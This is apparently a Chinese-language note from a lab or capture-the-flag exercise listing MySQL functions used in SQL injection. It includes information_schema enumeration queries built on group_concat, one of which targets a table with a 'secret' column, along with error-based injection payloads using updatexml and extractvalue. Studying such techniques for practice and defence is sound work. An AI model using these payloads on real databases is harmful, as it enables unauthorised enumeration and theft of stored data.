可利用的函数

0x00 AA

group_concat();
将查询结果合并成一个字符串；

group_concat(table_name) from information_schema.tables where table_schema='challenges'
eu2ivk78cb

group_concat(column_name) from information_schema.columns where table_name='eu2ivk78cb'
id,sessid,secret_GA8U,tryy

group_concat(id,sessid,secret_GA8U,tryy) from eu2ivk78cb

length();
获取字符串长度；//length(version());

substr(@str,start,len);
提取子字符串，从start开始，截取len个字符，mysql的字符下标是从1开始的;

hex(‘a’);//把字符转化成16进制表示
unhex();//16进制->字符
char(0x61);//16进制->字符

updatexml(1,concat(0x5e,version(),0x5e),1);//报错注入显示
extractvalue(1, concat(0x5c,version(),0x5c));//报错注入显示